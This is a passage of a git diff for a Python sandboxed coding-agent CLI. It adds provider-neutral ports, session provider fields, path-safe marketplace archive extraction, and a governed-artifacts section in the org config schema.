plugins and canonical name from a marketplace directory. + + Args: + marketplace_dir: Root of the marketplace + fallback_name: Name to use if marketplace.json doesn't specify one + + Returns: + DiscoveryResult with plugins and canonical name, or None if structure is invalid + """ + manifest_path = marketplace_dir / ".claude-plugin" / "marketplace.json" + + if not manifest_path.exists(): + return None + + try: + data = json.loads(manifest_path.read_text()) + plugins = data.get("plugins", []) + plugin_names = [p.get("name", "") for p in plugins if isinstance(p, dict)] + + # Get canonical name from marketplace.json - this is what Claude Code uses + canonical_name = data.get("name", fallback_name) + if not canonical_name: + canonical_name = fallback_name + + return DiscoveryResult(plugins=plugin_names, canonical_name=canonical_name) + except (json.JSONDecodeError, KeyError): + return DiscoveryResult(plugins=[], canonical_name=fallback_name) + + +# ───────────────────────────────────────────────────────────────────────────── +# Git Operations +# ───────────────────────────────────────────────────────────────────────────── + + +def run_git_clone( + url: str, + target_dir: Path, + branch: str = "main", + depth: int = 1, + fallback_name: str = "", +) -> CloneResult: + """Clone a git repository to target directory. + + Args: + url: Git clone URL + target_dir: Directory to clone into + branch: Branch to checkout + depth: Clone depth (1 for shallow) + fallback_name: Fallback name if marketplace.json doesn't specify one + + Returns: + CloneResult with success status, commit SHA, and canonical name + """ + # Import here to avoid circular dependency at module level + from scc_cli.marketplace.materialize import GitNotAvailableError + + try: + # Clean target directory if exists + if target_dir.exists(): + shutil.rmtree(target_dir) + + # Clone with shallow depth for efficiency + cmd = [ + "git", + "clone", + "--depth", + str(depth), + "--branch", + branch, + "--", + url, + str(target_dir), + ] + + result = subprocess.run( + cmd, + capture_output=True, + text=True, + timeout=120, + ) + + if result.returncode != 0: + return CloneResult( + success=False, + error=result.stderr or "Clone failed", + ) + + # Get commit SHA + sha_result = subprocess.run( + ["git", "-C", str(target_dir), "rev-parse", "HEAD"], + capture_output=True, + text=True, + ) + commit_sha = sha_result.stdout.strip() if sha_result.returncode == 0 else None + + # Discover plugins and canonical name + discovery = _discover_plugins(target_dir, fallback_name=fallback_name) + + if discovery is None: + return CloneResult( + success=False, + commit_sha=commit_sha, + error="Missing .claude-plugin/marketplace.json", + ) + + return CloneResult( + success=True, + commit_sha=commit_sha, + plugins=discovery.plugins, + canonical_name=discovery.canonical_name, + ) + + except FileNotFoundError: + raise GitNotAvailableError() + except subprocess.TimeoutExpired: + return CloneResult( + success=False, + error="Clone operation timed out", + ) + + +# ───────────────────────────────────────────────────────────────────────────── +# URL Operations +# ───────────────────────────────────────────────────────────────────────────── + + +def download_and_extract( + url: str, + target_dir: Path, + headers: dict[str, str] | None = None, + fallback_name: str = "", + fetcher: RemoteFetcher | None = None, +) -> DownloadResult: + """Download and extract marketplace from URL. + + Args: + url: HTTPS URL to download + target_dir: Directory to extract into + headers: Optional HTTP headers + fallback_name: Fallback name if marketplace.json doesn't specify one + fetcher: Optional RemoteFetcher for HTTP downloads + + Returns: + DownloadResult with success status, ETag, and canonical name + """ + import tarfile + import tempfile + + remote_fetcher = fetcher + if remote_fetcher is None: + from scc_cli.bootstrap import get_default_adapters + + remote_fetcher = get_default_adapters().remote_fetcher + + try: + response = remote_fetcher.get(url, headers=headers, timeout=60) + except Exception as exc: + return DownloadResult( + success=False, + error=str(exc), + ) + + if response.status_code != 200: + return DownloadResult( + success=False, + error=f"HTTP {response.status_code}: Failed to download marketplace", + ) + + etag = response.headers.get("ETag") + + # Save to temp file + with tempfile.NamedTemporaryFile(delete=False, suffix=".tar.gz") as tmp: + tmp.write(response.content) + tmp_path = Path(tmp.name) + + try: + # Clean target directory if exists + if target_dir.exists(): + shutil.rmtree(target_dir) + target_dir.mkdir(parents=True) + + # Extract archive (path-safe) + with tarfile.open(tmp_path, "r:*") as tar: + safe_members: list[tarfile.TarInfo] = [] + for member in tar.getmembers(): + member_path = PurePosixPath(member.name) + windows_member_path = PureWindowsPath(member.name) + if member_path.is_absolute() or windows_member_path.is_absolute(): + return DownloadResult( + success=False, + error=f"Unsafe archive member (absolute path): {member.name}", + ) + if ".." in member_path.parts or ".." in windows_member_path.parts: + return DownloadResult( + success=False, + error=f"Unsafe archive member (path traversal): {member.name}", + ) + if "" in member_path.parts or "" in windows_member_path.parts: + return DownloadResult( + success=False, + error=f"Unsafe archive member (empty path segment): {member.name}", + ) + if "\\" in member.name or windows_member_path.drive: + return DownloadResult( + success=False, + error=f"Unsafe archive member (windows path): {member.name}", + ) + if ( + member.islnk() + or member.issym() + or member.ischr() + or member.isblk() + or member.isfifo() + ): + return DownloadResult( + success=False, + error=f"Unsafe archive member (link/device): {member.name}", + ) + safe_members.append(member) + + tar.extractall(target_dir, members=safe_members) + + # Discover plugins and canonical name + discovery = _discover_plugins(target_dir, fallback_name=fallback_name) + + if discovery is None: + return DownloadResult( + success=False, + error="Missing .claude-plugin/marketplace.json", + ) + + return DownloadResult( + success=True, + etag=etag, + plugins=discovery.plugins, + canonical_name=discovery.canonical_name, + ) + finally: + tmp_path.unlink(missing_ok=True) diff --git a/src/scc_cli/marketplace/schema.py b/src/scc_cli/marketplace/schema.py index 23a6216..fdb5b30 100644 --- a/src/scc_cli/marketplace/schema.py +++ b/src/scc_cli/marketplace/schema.py @@ -293,7 +293,7 @@ class DefaultsConfig(StrictModel): ge=1, le=168, ) - network_policy: Literal["corp-proxy-only", "unrestricted", "isolated"] | None = Field( + network_policy: Literal["open", "web-egress-enforced", "locked-down-web"] | None = Field( default=None, description="Network access policy", ) @@ -342,7 +342,7 @@ class TeamProfile(StrictModel): default_factory=list, description="Additional MCP servers for this team", ) - network_policy: Literal["corp-proxy-only", "unrestricted", "isolated"] | None = Field( + network_policy: Literal["open", "web-egress-enforced", "locked-down-web"] | None = Field( default=None, description="Override network policy for this team", ) diff --git a/src/scc_cli/models/plugin_audit.py b/src/scc_cli/models/plugin_audit.py index f5ba4a6..a891ca8 100644 --- a/src/scc_cli/models/plugin_audit.py +++ b/src/scc_cli/models/plugin_audit.py @@ -1,6 +1,6 @@ """Define data models for plugin audit feature. -Provide models for auditing Claude Code plugins, including manifest +Provide models for auditing plugins, including manifest parsing results and status reporting. The audit feature gives visibility into plugin components (MCP servers, diff --git a/src/scc_cli/platform.py b/src/scc_cli/platform.py index 156b2aa..9e559fa 100644 --- a/src/scc_cli/platform.py +++ b/src/scc_cli/platform.py @@ -239,13 +239,13 @@ def supports_colors() -> bool: Check various environment indicators. """ + if os.environ.get("FORCE_COLOR"): + return True + # Rich handles this well, but we can do basic detection if os.environ.get("NO_COLOR"): return False - if os.environ.get("FORCE_COLOR"): - return True - # Check if stdout is a TTY if hasattr(sys.stdout, "isatty") and sys.stdout.isatty(): return True diff --git a/src/scc_cli/ports/agent_provider.py b/src/scc_cli/ports/agent_provider.py new file mode 100644 index 0000000..b9317ec --- /dev/null +++ b/src/scc_cli/ports/agent_provider.py @@ -0,0 +1,78 @@ +"""Provider-neutral launch preparation contract.""" + +from __future__ import annotations + +from collections.abc import Mapping +from pathlib import Path +from typing import Any, Protocol + +from scc_cli.core.contracts import ( + AgentLaunchSpec, + AuthReadiness, + ProviderCapabilityProfile, + RenderArtifactsResult, +) +from scc_cli.core.governed_artifacts import ArtifactRenderPlan + + +class AgentProvider(Protocol): + """Prepare provider-owned launch plans for the runtime layer. + + Implementations own provider-specific auth, artifacts, argv/env generation, + and provider-core destination requirements while exposing a provider-neutral + contract to the rest of the application. + """ + + def capability_profile(self) -> ProviderCapabilityProfile: + """Return the provider capability profile used by planning and diagnostics.""" + ... + + def prepare_launch( + self, + *, + config: Mapping[str, Any], + workspace: Path, + settings_path: Path | None = None, + ) -> AgentLaunchSpec: + """Build a provider-owned launch specification for one workspace.""" + ... + + def auth_check(self) -> AuthReadiness: + """Check whether provider auth credentials are present and usable. + + Each adapter owns the definition of "ready": file existence, non-empty + content, parseable format. Wording must be truthful — "auth cache + present" not "logged in" (we check file presence, not token validity). + + Returns: + AuthReadiness with status, mechanism, and user-facing guidance. + """ + ... + + def bootstrap_auth(self) -> None: + """Perform provider-owned interactive auth bootstrap when needed.""" + ... + + def render_artifacts( + self, + plan: ArtifactRenderPlan, + workspace: Path, + ) -> RenderArtifactsResult: + """Render governed artifacts into provider-native surfaces. + + Consumes a provider-neutral ``ArtifactRenderPlan`` (produced by + ``core.bundle_resolver.resolve_render_plan``) and projects it into + provider-specific files, settings fragments, and config surfaces. + + The returned ``RenderArtifactsResult`` carries rendered paths, + skipped artifacts, warnings, and a settings fragment for the + launch pipeline to merge into the active config surface. + + Implementations MUST be deterministic and idempotent — the same + plan + workspace always produce the same output. + + Raises: + RendererError: If fail-closed rendering encounters a + materialization error, merge conflict, or invalid reference. + """ + ... diff --git a/src/scc_cli/ports/agent_runner.py b/src/scc_cli/ports/agent_runner.py index c34cf61..23ac6b8 100644 --- a/src/scc_cli/ports/agent_runner.py +++ b/src/scc_cli/ports/agent_runner.py @@ -12,7 +12,12 @@ class AgentRunner(Protocol): """Abstract agent runner operations.""" def build_settings(self, config: dict[str, Any], *, path: Path) -> AgentSettings: - """Render agent settings from a config payload.""" + """Serialize a config dict into provider-native format and return pre-rendered bytes. + + The implementation owns the serialisation format (JSON, TOML, etc.). + The returned ``AgentSettings.rendered_bytes`` is written verbatim by + the runtime — no further format assumption is made. See D035. + """ def build_command(self, settings: AgentSettings) -> AgentCommand: """Build the command used to launch the agent.""" diff --git a/src/scc_cli/ports/audit_event_sink.py b/src/scc_cli/ports/audit_event_sink.py new file mode 100644 index 0000000..40158ae --- /dev/null +++ b/src/scc_cli/ports/audit_event_sink.py @@ -0,0 +1,17 @@ +"""Port for durable audit-event persistence.""" + +from __future__ import annotations + +from typing import Protocol + +from scc_cli.core.contracts import AuditEvent + + +class AuditEventSink(Protocol): + """Persist canonical audit events to a durable sink.""" + + def append(self, event: AuditEvent) -> None: + """Append one audit event to the sink.""" + + def describe_destination(self) -> str: + """Return a human-readable destination description for error messages.""" diff --git a/src/scc_cli/ports/config_models.py b/src/scc_cli/ports/config_models.py index 7cab6cb..a03a307 100644 --- a/src/scc_cli/ports/config_models.py +++ b/src/scc_cli/ports/config_models.py @@ -11,6 +11,13 @@ from __future__ import annotations from dataclasses import dataclass, field +from typing import Any + +from scc_cli.core.governed_artifacts import ( + ArtifactBundle, + GovernedArtifact, + ProviderArtifactBinding, +) @dataclass(frozen=True) @@ -41,7 +48,7 @@ class SessionSettings: """Session configuration settings.""" timeout_hours: int | None = None - auto_resume: bool = False + auto_resume: bool | None = None @dataclass(frozen=True) @@ -77,8 +84,32 @@ class NormalizedTeamConfig: marketplace: str | None = None additional_plugins: tuple[str, ...] = () additional_mcp_servers: tuple[MCPServerConfig, ...] = () + network_policy: str | None = None session: SessionSettings = field(default_factory=SessionSettings) delegation: TeamDelegation = field(default_factory=TeamDelegation) + allowed_providers: tuple[str, ...] = () + enabled_bundles: tuple[str, ...] = () + + +@dataclass(frozen=True) +class SafetyNetConfig: + """Safety-net policy configuration within org security. + + Mirrors the shape of SafetyPolicy in contracts.py but lives + in the config model layer for normalization purposes. + D016: rules stays dict[str, Any] — matching SafetyPolicy. + """ + + action: str = "block" + rules: dict[str, Any] = field(default_factory=dict) + + +@dataclass(frozen=True) +class StatsConfig: + """Telemetry / stats configuration.""" + + enabled: bool = False + endpoint: str | None = None @dataclass(frozen=True) @@ -89,6 +120,7 @@ class SecurityConfig: blocked_mcp_servers: tuple[str, ...] = () allow_stdio_mcp: bool = False allowed_stdio_prefixes: tuple[str, ...] = () + safety_net: SafetyNetConfig = field(default_factory=SafetyNetConfig) @dataclass(frozen=True) @@ -148,6 +180,20 @@ class OrganizationInfo: name: str +@dataclass(frozen=True) +class GovernedArtifactsCatalog: + """Org-level governed artifacts catalog. + + Holds the approved artifact definitions, their provider bindings, + and the approved bundle definitions. This is the provider-neutral + source of truth that bundle resolution reads from. + """ + + artifacts: dict[str, GovernedArtifact] = field(default_factory=dict) + bindings: dict[str, tuple[ProviderArtifactBinding, ...]] = field(default_factory=dict) + bundles: dict[str, ArtifactBundle] = field(default_factory=dict) + + @dataclass(frozen=True) class NormalizedOrgConfig: """Normalized organization configuration. @@ -162,6 +208,24 @@ class NormalizedOrgConfig: delegation: DelegationConfig = field(default_factory=DelegationConfig) profiles: dict[str, NormalizedTeamConfig] = field(default_factory=dict) marketplaces: dict[str, MarketplaceConfig] = field(default_factory=dict) + stats: StatsConfig = field(default_factory=StatsConfig) + governed_artifacts: GovernedArtifactsCatalog = field(default_factory=GovernedArtifactsCatalog) + config_source: str | None = None + + @classmethod + def from_dict(cls, raw: dict[str, Any]) -> NormalizedOrgConfig: + """Create a NormalizedOrgConfig from a raw dict. + + Convenience wrapper around normalize_org_config() for use in tests + and application code that starts from raw dicts. + + Uses importlib to avoid a static ports→adapters import that would + violate the architectural import boundary enforced by tests. + """ + import importlib + + mod = importlib.import_module("scc_cli.adapters.config_normalizer") + return mod.normalize_org_config(raw) # type: ignore[no-any-return] def get_profile(self, name: str) -> NormalizedTeamConfig | None: """Get a team profile by name.""" diff --git a/src/scc_cli/ports/models.py b/src/scc_cli/ports/models.py index 5048dd1..096be9d 100644 --- a/src/scc_cli/ports/models.py +++ b/src/scc_cli/ports/models.py @@ -6,7 +6,10 @@ from datetime import datetime from enum import Enum from pathlib import Path -from typing import Any +from typing import TYPE_CHECKING, Any + +if TYPE_CHECKING: + from scc_cli.core.contracts import DestinationSet @dataclass(frozen=True) @@ -30,10 +33,15 @@ class SandboxSpec: user: str | None = None group: str | None = None extra_mounts: list[MountSpec] = field(default_factory=list) + destination_sets: tuple[DestinationSet, ...] = () continue_session: bool = False force_new: bool = False agent_settings: AgentSettings | None = None org_config: dict[str, Any] | None = None + agent_argv: list[str] = field(default_factory=list) + data_volume: str = "" + config_dir: str = "" + provider_id: str = "" @dataclass(frozen=True) @@ -63,6 +71,21 @@ class SandboxStatus: stopped_at: datetime | None = None +@dataclass(frozen=True) +class SandboxConflict: + """Describe a launch conflict with an already-existing sandbox. + + This is intentionally runtime-neutral: callers only learn that a sandbox + already exists for the requested launch spec, plus enough metadata to + render operator-facing guidance. Callers do not infer provider-specific + behavior from this model. + """ + + handle: SandboxHandle + state: SandboxState + process_summary: str | None = None + + @dataclass(frozen=True) class AgentCommand: """Command specification for launching an agent.""" @@ -74,7 +97,20 @@ class AgentCommand: @dataclass(frozen=True) class AgentSettings: - """Settings payload and target location for an agent.""" + """Pre-rendered settings payload and target location for an agent. + + The runner (``AgentRunner.build_settings``) is responsible for + serialising the config dict into the correct wire format (JSON for + Claude, TOML for Codex, etc.) and returning ``rendered_bytes``. + The OCI runtime writes these bytes verbatim — it never assumes a + particular serialisation format. See D035. + + Attributes: + rendered_bytes: Serialised config content ready to write to disk. + path: Absolute target path inside the container. + suffix: File extension hint (e.g. ``".json"``, ``".toml"``). + """ - content: dict[str, Any] + rendered_bytes: bytes path: Path + suffix: str = ".json" diff --git a/src/scc_cli/ports/runtime_probe.py b/src/scc_cli/ports/runtime_probe.py new file mode 100644 index 0000000..75257f1 --- /dev/null +++ b/src/scc_cli/ports/runtime_probe.py @@ -0,0 +1,24 @@ +"""Runtime probe port definition.""" + +from __future__ import annotations + +from typing import Protocol + +from scc_cli.core.contracts import RuntimeInfo + + +class RuntimeProbe(Protocol): + """Probe the local runtime environment and return capability information. + + Invariants: + - probe() never raises; it returns the truthful detected state. + - The returned RuntimeInfo reflects the current host environment. + """ + + def probe(self) -> RuntimeInfo: + """Detect runtime capabilities and return a populated RuntimeInfo. + + Returns: + RuntimeInfo describing the detected runtime backend. + """ + ... diff --git a/src/scc_cli/ports/safety_adapter.py b/src/scc_cli/ports/safety_adapter.py new file mode 100644 index 0000000..6839dd7 --- /dev/null +++ b/src/scc_cli/ports/safety_adapter.py @@ -0,0 +1,27 @@ +"""SafetyAdapter protocol — provider-specific UX/audit wrapper over SafetyEngine.""" + +from __future__ import annotations + +from typing import Protocol + +from scc_cli.core.contracts import SafetyCheckResult, SafetyPolicy + + +class SafetyAdapter(Protocol): + """Port for provider-specific safety check formatting and audit emission. + + Implementations delegate verdict logic to a SafetyEngine, then format + the result for provider UX and emit an audit event. + """ + + def check_command(self, command: str, policy: SafetyPolicy) -> SafetyCheckResult: + """Evaluate a command through the safety engine, emit audit, and format result. + + Args: + command: Shell command string to evaluate. + policy: Safety policy containing rules and baseline action. + + Returns: + A provider-formatted safety check result. + """ + ... diff --git a/src/scc_cli/ports/safety_engine.py b/src/scc_cli/ports/safety_engine.py new file mode 100644 index 0000000..025e961 --- /dev/null +++ b/src/scc_cli/ports/safety_engine.py @@ -0,0 +1,28 @@ +"""SafetyEngine protocol — provider-neutral command evaluation port.""" + +from __future__ import annotations + +from typing import Protocol + +from scc_cli.core.contracts import SafetyPolicy, SafetyVerdict + + +class SafetyEngine(Protocol): + """Port for evaluating commands against a safety policy. + + Implementations match commands against rule modules (git rules, + network tool rules, etc.) and return a typed verdict. The engine + is provider-neutral: both Claude and Codex adapters consume it. + """ + + def evaluate(self, command: str, policy: SafetyPolicy) -> SafetyVerdict: + """Evaluate a command string against the given safety policy. + + Args: + command: Shell command string to evaluate. + policy: Safety policy containing rules and baseline action. + + Returns: + A typed verdict indicating whether the command is allowed. + """ + ... diff --git a/src/scc_cli/ports/sandbox_runtime.py b/src/scc_cli/ports/sandbox_runtime.py index 02906f8..dc55bc4 100644 --- a/src/scc_cli/ports/sandbox_runtime.py +++ b/src/scc_cli/ports/sandbox_runtime.py @@ -4,7 +4,7 @@ from typing import Protocol -from scc_cli.ports.models import SandboxHandle, SandboxSpec, SandboxStatus +from scc_cli.ports.models import SandboxConflict, SandboxHandle, SandboxSpec, SandboxStatus class SandboxRuntime(Protocol): @@ -12,21 +12,41 @@ class SandboxRuntime(Protocol): def ensure_available(self) -> None: """Ensure the runtime is available and ready for use.""" + ... def run(self, spec: SandboxSpec) -> SandboxHandle: """Launch a sandbox session for the given spec.""" + ... + + def detect_launch_conflict(self, spec: SandboxSpec) -> SandboxConflict | None: + """Return an existing live conflict for *spec*, if one exists. + + Runtimes should return ``None`` when the requested launch can proceed + without user intervention. Typical examples: + - no prior sandbox exists + - a stale/stopped sandbox can be auto-replaced safely + - ``spec.force_new`` already requests replacement + + The command/UI layer owns how interactive users resolve a conflict. + """ + ... def resume(self, handle: SandboxHandle) -> None: """Resume a stopped sandbox session.""" + ... def stop(self, handle: SandboxHandle) -> None: """Stop a running sandbox session.""" + ... def remove(self, handle: SandboxHandle) -> None: """Remove a sandbox session.""" + ... def list_running(self) -> list[SandboxHandle]: """List running sandbox sessions.""" + ... def status(self, handle: SandboxHandle) -> SandboxStatus: """Return status details for a sandbox session.""" + ... diff --git a/src/scc_cli/ports/session_models.py b/src/scc_cli/ports/session_models.py index 807ec55..86f4109 100644 --- a/src/scc_cli/ports/session_models.py +++ b/src/scc_cli/ports/session_models.py @@ -32,7 +32,8 @@ class SessionRecord: branch: str | None = None last_used: str | None = None created_at: str | None = None - schema_version: int = 1 + provider_id: str | None = None + schema_version: int = 2 def to_dict(self) -> dict[str, Any]: """Serialize the record for JSON storage. @@ -60,6 +61,7 @@ def from_dict(cls, data: dict[str, Any]) -> SessionRecord: branch=data.get("branch"), last_used=data.get("last_used"), created_at=data.get("created_at"), + provider_id=data.get("provider_id"), schema_version=data.get("schema_version", 1), ) @@ -78,6 +80,7 @@ class SessionSummary: last_used: ISO 8601 timestamp string (format at edges). container_name: Linked container name. branch: Git branch name for the session. + provider_id: Provider identifier (e.g. 'claude', 'codex') or None. """ name: str @@ -86,6 +89,7 @@ class SessionSummary: last_used: str | None container_name: str | None branch: str | None + provider_id: str | None = None @dataclass(frozen=True) @@ -99,11 +103,13 @@ class SessionFilter: limit: Maximum number of sessions to return. team: Optional team filter. include_all: Whether to ignore team filtering. + provider_id: Optional provider filter (e.g. 'claude', 'codex'). """ limit: int = 10 team: str | None = None include_all: bool = False + provider_id: str | None = None @dataclass(frozen=True) diff --git a/src/scc_cli/presentation/json/launch_audit_json.py b/src/scc_cli/presentation/json/launch_audit_json.py new file mode 100644 index 0000000..f649034 --- /dev/null +++ b/src/scc_cli/presentation/json/launch_audit_json.py @@ -0,0 +1,12 @@ +"""JSON mapping helpers for launch-audit support output.""" + +from __future__ import annotations + +from ...application.launch.audit_log import LaunchAuditDiagnostics +from ...json_output import build_envelope +from ...kinds import Kind + + +def build_launch_audit_envelope(diagnostics: LaunchAuditDiagnostics) -> dict[str, object]: + """Build the JSON envelope for launch-audit support output.""" + return build_envelope(Kind.LAUNCH_AUDIT, data=diagnostics.to_dict()) diff --git a/src/scc_cli/presentation/json/safety_audit_json.py b/src/scc_cli/presentation/json/safety_audit_json.py new file mode 100644 index 0000000..188dfd7 --- /dev/null +++ b/src/scc_cli/presentation/json/safety_audit_json.py @@ -0,0 +1,12 @@ +"""JSON mapping helpers for safety-audit support output.""" + +from __future__ import annotations + +from ...application.safety_audit import SafetyAuditDiagnostics +from ...json_output import build_envelope +from ...kinds import Kind + + +def build_safety_audit_envelope(diagnostics: SafetyAuditDiagnostics) -> dict[str, object]: + """Build the JSON envelope for safety-audit support output.""" + return build_envelope(Kind.SAFETY_AUDIT, data=diagnostics.to_dict()) diff --git a/src/scc_cli/presentation/json/sessions_json.py b/src/scc_cli/presentation/json/sessions_json.py index de97dc2..bbbf875 100644 --- a/src/scc_cli/presentation/json/sessions_json.py +++ b/src/scc_cli/presentation/json/sessions_json.py @@ -12,15 +12,17 @@ def build_session_list_data( sessions: list[dict[str, Any]], *, team: str | None = None, + provider_id: str | None = None, ) -> dict[str, Any]: """Build JSON-ready session list data. Invariants: - - Preserve keys: `sessions`, `count`, and `team`. + - Preserve keys: `sessions`, `count`, `team`, and `provider_id`. Args: sessions: Serialized session dictionaries. team: Optional team filter label. + provider_id: Optional provider filter label. Returns: Dictionary payload for session list output. @@ -29,6 +31,7 @@ def build_session_list_data( "sessions": sessions, "count": len(sessions), "team": team, + "provider_id": provider_id, } diff --git a/src/scc_cli/schemas/org-v1.schema.json b/src/scc_cli/schemas/org-v1.schema.json index 6c6fcb9..e6ccb23 100644 --- a/src/scc_cli/schemas/org-v1.schema.json +++ b/src/scc_cli/schemas/org-v1.schema.json @@ -394,7 +394,7 @@ }, "network_policy": { "type": "string", - "enum": ["corp-proxy-only", "unrestricted", "isolated"], + "enum": ["open", "web-egress-enforced", "locked-down-web"], "description": "Network access policy" }, "session": { @@ -513,7 +513,7 @@ }, "network_policy": { "type": "string", - "enum": ["corp-proxy-only", "unrestricted", "isolated"], + "enum": ["open", "web-egress-enforced", "locked-down-web"], "description": "Override network policy for this team" }, "session": { @@ -542,11 +542,133 @@ "trust": { "$ref": "#/$defs/TrustGrant", "description": "Trust delegation controls for federated teams" + }, + "enabled_bundles": { + "type": "array", + "items": {"type": "string"}, + "description": "Bundle names from governed_artifacts.bundles to enable for this team. Bundles are resolved by the bundle pipeline into provider-native surfaces." } }, "additionalProperties": false } }, + "governed_artifacts": { + "type": "object", + "description": "Governed artifact catalog — approved reusable units (skills, MCP servers, native integrations) and their provider bindings. Bundles group artifacts for team selection. Provider surfaces are intentionally asymmetric: Claude and Codex each have their own native integration shapes.", + "properties": { + "artifacts": { + "type": "object", + "description": "Approved artifact definitions (key = artifact name)", + "additionalProperties": { + "type": "object", + "properties": { + "kind": { + "type": "string", + "enum": ["skill", "mcp_server", "native_integration"], + "description": "Artifact category: skill (portable), mcp_server (portable), or native_integration (requires provider-specific binding)" + }, + "version": { + "type": "string", + "description": "Pinned version or source ref" + }, + "publisher": { + "type": "string", + "description": "Owner or publisher metadata for audit" + }, + "pinned": { + "type": "boolean", + "default": false, + "description": "Whether the artifact version is locked" + }, + "source_type": { + "type": "string", + "enum": ["git", "url", "local"], + "description": "Origin kind" + }, + "source_url": { + "type": "string", + "description": "Remote location of the artifact source" + }, + "source_path": { + "type": "string", + "description": "Path within the source tree" + }, + "source_ref": { + "type": "string", + "description": "Git ref, tag, or commit for pinning" + }, + "install_intent": { + "type": "string", + "enum": ["required", "available", "disabled", "request-only"], + "default": "available", + "description": "Operator expectation for this artifact" + } + }, + "required": ["kind"], + "additionalProperties": false + } + }, + "bindings": { + "type": "object", + "description": "Provider-specific bindings per artifact (key = artifact name). Skills and MCP servers are portable and may have no bindings; native_integration artifacts require at least one.", + "additionalProperties": { + "type": "array", + "items": { + "type": "object", + "properties": { + "provider": { + "type": "string", + "description": "Target provider identifier (e.g. 'claude', 'codex')" + }, + "native_ref": { + "type": "string", + "description": "Primary native reference for the binding" + }, + "native_config": { + "type": "object", + "additionalProperties": {"type": "string"}, + "description": "Provider-specific config (hooks, rules, plugin_bundle, instructions, etc.)" + }, + "transport_type": { + "type": "string", + "enum": ["sse", "stdio", "http"], + "description": "Transport hint for MCP bindings" + } + }, + "required": ["provider"], + "additionalProperties": false + } + } + }, + "bundles": { + "type": "object", + "description": "Approved artifact bundles — team-facing selection units (key = bundle name)", + "additionalProperties": { + "type": "object", + "properties": { + "description": { + "type": "string", + "description": "Human-readable bundle description" + }, + "artifacts": { + "type": "array", + "items": {"type": "string"}, + "description": "Ordered artifact names that compose this bundle" + }, + "install_intent": { + "type": "string", + "enum": ["required", "available", "disabled", "request-only"], + "default": "available", + "description": "Operator expectation for the bundle as a whole" + } + }, + "required": ["artifacts"], + "additionalProperties": false + } + } + }, + "additionalProperties": false + }, "stats": { "type": "object", "description": "Usage statistics configuration", diff --git a/src/scc_cli/sessions.py b/src/scc_cli/sessions.py index cac741d..ee3d7e1 100644 --- a/src/scc_cli/sessions.py +++ b/src/scc_cli/sessions.py @@ -1,12 +1,12 @@ """ -Manage Claude Code sessions. +Manage agent sessions. Track recent sessions, workspaces, containers, and enable resuming. Container Linking: - Sessions are linked to their Docker container names - Container names are deterministic: scc-- -- This enables seamless resume of Claude Code conversations +- This enables seamless resume of agent conversations """ from __future__ import annotations @@ -23,7 +23,7 @@ from scc_cli.ports.session_store import SessionStore from scc_cli.ui.time_format import format_relative_time_from_datetime -from .core.constants import AGENT_CONFIG_DIR +from .core.provider_registry import get_runtime_spec # ═══════════════════════════════════════════════════════════════════════════════ # Store Wiring @@ -73,6 +73,7 @@ def record_session( session_name: str | None = None, container_name: str | None = None, branch: str | None = None, + provider_id: str | None = None, *, filesystem: Filesystem | None = None, ) -> SessionRecord: @@ -84,6 +85,7 @@ def record_session( session_name=session_name, container_name=container_name, branch=branch, + provider_id=provider_id, ) @@ -189,18 +191,18 @@ def prune_orphaned_sessions(filesystem: Filesystem | None = None) -> int: # ═══════════════════════════════════════════════════════════════════════════════ -# Claude Code Integration +# Agent Integration # ═══════════════════════════════════════════════════════════════════════════════ -def get_claude_sessions_dir() -> Path: - """Return the Claude Code sessions directory.""" - return Path.home() / AGENT_CONFIG_DIR +def get_provider_sessions_dir(provider_id: str = "claude") -> Path: + """Return the agent sessions directory for a provider.""" + return Path.home() / get_runtime_spec(provider_id).config_dir -def get_claude_recent_sessions() -> list[dict[Any, Any]]: - """Return recent sessions from Claude Code's own storage.""" - claude_dir = get_claude_sessions_dir() +def get_provider_recent_sessions(provider_id: str = "claude") -> list[dict[Any, Any]]: + """Return recent sessions from the agent's own storage.""" + claude_dir = get_provider_sessions_dir(provider_id) sessions_file = claude_dir / "sessions.json" if sessions_file.exists(): diff --git a/src/scc_cli/setup.py b/src/scc_cli/setup.py index d6f1057..fc061eb 100644 --- a/src/scc_cli/setup.py +++ b/src/scc_cli/setup.py @@ -1,472 +1,62 @@ """ -Setup wizard for SCC - Sandboxed Claude CLI. +Setup wizard for SCC - Sandboxed Coding CLI. Remote organization config workflow: - Prompt for org config URL (or standalone mode) - Handle authentication (env:VAR, command:CMD) - Team/profile selection from remote config - Git hooks enablement option - -Philosophy: "Get started in under 60 seconds" -- Minimal questions -- Smart defaults -- Clear guidance """ from typing import Any, cast -import readchar from rich import box -from rich.columns import Columns -from rich.console import Console, RenderableType -from rich.live import Live +from rich.console import Console from rich.panel import Panel from rich.table import Table from rich.text import Text from . import config +from .bootstrap import get_default_adapters +from .commands.launch.dependencies import get_agent_provider +from .commands.launch.provider_choice import collect_provider_readiness +from .core.errors import ProviderNotReadyError +from .core.provider_resolution import get_provider_display_name +from .panels import create_info_panel from .remote import ( fetch_org_config, looks_like_github_url, looks_like_gitlab_url, save_to_cache, ) -from .theme import Borders, Indicators, Spinners -from .ui.chrome import LayoutMetrics, apply_layout, get_layout_metrics, print_with_layout -from .ui.prompts import confirm_with_layout, prompt_with_layout - -# ═══════════════════════════════════════════════════════════════════════════════ -# Arrow-Key Selection Component -# ═══════════════════════════════════════════════════════════════════════════════ - - -def _layout_metrics(console: Console) -> LayoutMetrics: - """Return layout metrics for setup rendering.""" - return get_layout_metrics(console, max_width=104) - - -def _print_padded(console: Console, renderable: RenderableType, metrics: LayoutMetrics) -> None: - """Print with layout padding when applicable.""" - print_with_layout(console, renderable, metrics=metrics, constrain=True) - - -def _build_hint_text(hints: list[tuple[str, str]]) -> Text: - """Build a compact hint line with middot separators.""" - text = Text() - for index, (key, action) in enumerate(hints): - if index > 0: - text.append(" · ", style="dim") - text.append(key, style="cyan bold") - text.append(" ", style="dim") - text.append(action, style="dim") - return text - - -def _select_option( - console: Console, - options: list[tuple[str, str, str]], - *, - default: int = 0, -) -> int | None: - """Interactive arrow-key selection for setup options. - Args: - console: Rich console for output. - options: List of (label, tag, description) tuples. - default: Default selected index. - - Returns: - Selected index (0-based), or None if cancelled. - """ - cursor = default - cursor_symbol = Indicators.get("CURSOR") - - def _render_options() -> RenderableType: - """Render options for the live picker.""" - metrics = _layout_metrics(console) - content_width = metrics.content_width - min_label_width = min(36, max(24, content_width // 3)) - label_width = max(min_label_width, max((len(label) for label, _, _ in options), default=0)) - tag_width = max((len(tag) for _, tag, _ in options), default=0) - - body = Text() - if not metrics.tight_height: - body.append("\n") - - for i, (label, tag, desc) in enumerate(options): - 